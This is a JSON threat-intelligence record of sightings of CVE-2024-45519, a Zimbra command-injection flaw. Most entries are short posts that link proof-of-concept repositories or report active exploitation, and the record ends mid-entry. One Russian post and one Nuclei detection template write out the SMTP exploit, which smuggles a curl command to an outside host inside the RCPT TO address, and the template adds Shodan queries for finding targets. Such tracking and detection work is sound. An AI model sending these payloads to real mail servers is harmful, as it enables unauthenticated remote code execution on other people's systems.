{"vulnerability": "CVE-2024-45519", "sightings": [{"uuid": "78101531-46de-4397-a76a-551ef4b6164f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/zttbytd.com/post/3leypimntq42j", "content": "", "creation_timestamp": "2025-01-05T13:19:39.524290Z"}, {"uuid": "2b623d22-0e2d-4995-b3ba-9a48ea57aabc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "content": "", "creation_timestamp": "2025-02-17T08:58:49.232676Z"}, {"uuid": "ec8db3a4-3686-4d73-9414-39b71fde0130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:59.000000Z"}, {"uuid": "2ecfe12b-51e5-4abd-90f8-18fb130ff00a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ca550ce6-190e-460d-a052-c77cd8457862", "content": "", "creation_timestamp": "2026-02-02T12:26:27.312262Z"}, {"uuid": "5a6b31e3-4d0a-49a4-bde6-3791394e8144", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ca550ce6-190e-460d-a052-c77cd8457862", "content": "", "creation_timestamp": "2026-02-02T12:26:27.312262Z"}, {"uuid": "00639f28-f672-4275-aed7-0c3be9b64f3d", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T01:37:36.000000Z"}, {"uuid": "f43466bd-5cce-43a1-a602-1be9cdc29943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ptswarm/220", "content": "\u26a0\ufe0f We've confirmed critical CVE-2024-45519 in Zimbra!\n\nSMTP-based vulnerability in postjournal service allows unauthenticated attackers to inject commands under zimbra user.\n\n\u2705 Update your software ASAP to avoid exploitation!", "creation_timestamp": "2024-09-24T15:21:20.000000Z"}, {"uuid": "84dc77dc-a0d6-4019-b2ff-30d75af95cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/224", "content": "\ud83e\udd20 A notorious RCE in Zimbra, CVE-2024-45519 \u2013 here\u2019s our expert breakdown!\n\nHigh resolution", "creation_timestamp": "2024-09-30T14:31:29.000000Z"}, {"uuid": "d1cdb031-308e-4a5c-8212-1cabb0f8380d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/167", "content": "#zimbra #rce\n\n\u0412\u044b\u0448\u043b\u0430 
\u043d\u043e\u0432\u0430\u044f CVE-2024-45519 \u043d\u0430 Zimbra Collaboration Suite &lt; 9.0.0, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441 postjournal. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\u0412 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u0441\u0442\u0430\u043c \u0445\u043e\u0447\u0443 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e Zimbra \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c postjournal.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438:\nEHLO localhost\nMAIL FROM: \nRCPT TO: &lt;\"aabbb$(curl${IFS}oast.me)\"@mail.domain.com&gt;\nDATA\nTest message\n.\n\n\u0422\u0430\u043a \u0436\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u043e\u0434\u0438\u043d \u0438\u0437 \u0434\u0432\u0443\u0445 \u043f\u0443\u043d\u043a\u0442\u043e\u0432:\n- \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0431\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 (\u0441\u043f\u0438\u0441\u043e\u043a mynetworks), \u043b\u0438\u0431\u043e 
\u0440\u0430\u0441\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0447\u0442\u043e \u043e\u043d\u0430 \u0431\u0443\u0434\u0435\u0442 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430\n- \u043f\u0440\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.\n\n\u041f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b (\u0448\u0430\u0431\u043b\u043e\u043d nuclei \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435) \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0445\u0430.\n\n\u0414\u0435\u0442\u0430\u043b\u0438 \u0432 \u043e\u0442\u043b\u0438\u0447\u043d\u043e\u043c \u0440\u0430\u0437\u0431\u043e\u0440\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 ProjectDiscovery.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n- \u0420\u0430\u0437\u0431\u043e\u0440: https://blog.projectdiscovery.io/zimbra-remote-code-execution/\n- \u0428\u0430\u0431\u043b\u043e\u043d: https://github.com/projectdiscovery/nuclei-templates/pull/10860", "creation_timestamp": "2024-09-29T10:37:41.000000Z"}, {"uuid": "370bcf36-2012-4b54-8e4f-2fda7163512f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/QxnLRuWdGgoTS9SuvQjCy4QGFdybsJKul7e0GN0IcFjceA", "content": "", "creation_timestamp": "2024-09-29T21:40:08.000000Z"}, {"uuid": "18b515af-affc-4c92-a6ae-8ea0a6837af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": 
"published-proof-of-concept", "source": "https://t.me/ton618cyber/1598", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-&gt; https://github.com/p33d/CVE-2024-45519\n\n2. CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:49.000000Z"}, {"uuid": "dff0dc1f-b2e4-4a44-af11-f3234b22f447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/4362", "content": "\ud83d\udea8PoC CVE-2024-45519 - Zimbra Postjournal Exploit\n\nhttps://darkwebinformer.com/poc-cve-2024-45519-zimbra-postjournal-exploit/", "creation_timestamp": "2024-10-05T18:46:25.000000Z"}, {"uuid": "05d3c9e9-1bd5-4e20-bd8d-c9baa75c394b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/cvedetector/6885", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45519 - Zimbra Collaboration Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45519 \nPublished : Oct. 2, 2024, 10:15 p.m. | 24\u00a0minutes ago \nDescription : The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands. 
\nSeverity: 10.0 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-03T00:43:48.000000Z"}, {"uuid": "00677a7b-d12d-4b21-93d2-e6970249cda9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/455", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T14:25:00.000000Z"}, {"uuid": "0f53449f-0fb2-49c5-9f41-7cfabd36f9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1096", "content": "\u26a1\ufe0fActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519.\n\n#CyberBulletin", "creation_timestamp": "2024-10-07T13:15:35.000000Z"}, {"uuid": "3e7fea30-d32a-46ac-8cf3-d64a4a755b64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1662", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\n#github #exploit #zimbra #rce", "creation_timestamp": "2024-10-06T05:30:19.000000Z"}, {"uuid": "e0154cfc-cd05-41fa-9949-18367bf4fe69", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15377", "content": "\u200aActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519\n\nhttps://securityonline.info/active-exploits-target-zimbra-collaboration-over-19k-systems-vulnerable-to-cve-2024-45519/", "creation_timestamp": "2024-10-08T03:27:19.000000Z"}, {"uuid": "a2a5c24f-e245-423c-96b0-75286e7244b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18985", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "dece0112-4011-4e40-9ef5-0b3c3738df43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/22507", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. 
The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "f320026c-6323-4ba5-9792-27dc838eb3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/376", "content": "\ud83c\udf83 CVE-2024-45519 : Zimbra - Remote Command Execution\n\nZimbra - \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0434\u043b\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b\n\nNuclei \u0448\u0430\u0431\u043b\u043e\u043d:\n\nid: CVE-2024-45519\n\ninfo:\n  name: Zimbra Collaboration Suite &lt; 9.0.0 - Remote Code Execution\n  author: pdresearch,iamnoooob,parthmalhotra,ice3man543\n  severity: critical\n  description: |\n    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. 
Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system\u2019s integrity and confidentiality.\n  reference:\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n  classification:\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n      - http.favicon.hash:1624375939\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n  tags: cve,cve2024,rce,zimbra\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host,Port);\n    code: |\n      let m = require('nuclei/net');\n      let address = Host+\":\"+Port;\n      let conn;\n      conn=  m.Open('tcp', address)\n      conn.Send('EHLO localhost\\r\\n');\n      conn.RecvString()\n      conn.Send('MAIL FROM: \\r\\n');\n      conn.RecvString()\n      conn.Send('RCPT TO: &lt;\"aabbb$(curl${IFS}'+oast+')\"@mail.domain.com&gt;\\r\\n');\n      conn.RecvString()\n      conn.Send('DATA\\r\\n');\n      conn.RecvString()\n      conn.Send('aaa\\r\\n');\n      conn.RecvString()\n      conn.Send('.\\r\\n');\n      resp = conn.RecvString()\n      conn.Send('QUIT\\r\\n');\n      conn.Close()\n      resp\n    args:\n      Host: \"{{Host}}\"\n      Port: 25\n      oast: \"{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        words:\n          - \"message delivered\"\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.0 Patch 41 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0430 
\u0442\u0430\u043a\u0436\u0435 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 10.0.9 \u0438 10.1.1 \u0438 Zimbra 8.8.15 Patch 46 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445\n\n\ud83d\udcbb PoC\n\n#rce #cve #zimbra #poc\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-10-06T09:04:26.000000Z"}, {"uuid": "be9c394b-9c15-4530-8b86-04a69d9f2a10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/151795", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "49783f6d-594f-4fe9-b90c-afa811a72bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/LZ7XOPRoqwALVNc8I3LUwpNf-8CJ2PR-4TjRcjv0Z8qsO3g", "content": "", "creation_timestamp": "2025-03-09T04:00:07.000000Z"}, {"uuid": "bc17480e-be20-4e66-b5ee-14af44a02b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8888", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - 
CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "1f93d50d-2e61-4b2e-b4bd-93b98c8d58b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8864", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "3050adeb-12ff-4c6e-9e83-3fe54857daeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/528", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "5468fe6a-2af3-41d6-b303-401f4140e8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/proxy_bar/2279", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T11:36:37.000000Z"}, {"uuid": "08144ebe-ee15-4884-a9e4-3c7159ac66e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2294", "content": "\u041c\u044b \u0443\u0436\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e \u043f\u043e\u0432\u043e\u0434\u0443 CVE-2024-45519 - Zimbra\n*\n\u041d\u043e, \u0432\u043e\u0442 \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 Postjournal Exploit + \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043a\u0430\u043a \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0441\u0442\u0435\u043d\u0434 \u0447\u0442\u043e \u0431\u044b \u043f\u043e\u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f \u0441\u043e \u0441\u043f\u043b\u043e\u0438\u0442\u043e\u043c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043f\u043e\u0432\u044b\u0448\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 (\u043b\u0438\u0431\u043e \u0432 \u0431\u043e\u043a \u0443\u0445\u043e\u0434\u0438\u0442\u044c)\n*\nzimbra.labo", "creation_timestamp": "2024-10-05T08:14:30.000000Z"}, {"uuid": "2d09665d-90a0-44b7-83be-8d8fd2f10c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", 
"vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/thehackernews/5670", "content": "\u26a0\ufe0f Zimbra Collaboration is under attack via a critical vulnerability (CVE-2024-45519) enabling remote command execution. \n \nEven without Zimbra\u2019s postjournal enabled, attackers can exploit this flaw with crafted SMTP messages. \n \nLearn more: https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html", "creation_timestamp": "2024-10-02T07:58:40.000000Z"}, {"uuid": "f6a17e53-7633-4027-acca-fc3928f1d9d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/25904", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:35.000000Z"}, {"uuid": "f7921ad2-30c3-4ed6-8666-490a7e0c84a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/CyberBulletin/25905", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:33.000000Z"}, {"uuid": "dabed7c4-7e36-4090-9b40-502aafdbf30d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3252", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T20:31:34.000000Z"}, {"uuid": "72ef0e9e-00bf-41a1-9ce2-4dffba3e3103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 
"CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3793", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle &amp; Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:01:06.000000Z"}, {"uuid": "5d32a4dd-8b14-4fde-b22c-d90d576dc101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/f7787455-9994-4047-b6f7-77347597c104", "content": "", "creation_timestamp": "2025-08-26T18:36:20.000000Z"}, {"uuid": "58811040-4cf4-441c-91f0-c87fe0a3217b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8680", "content": 
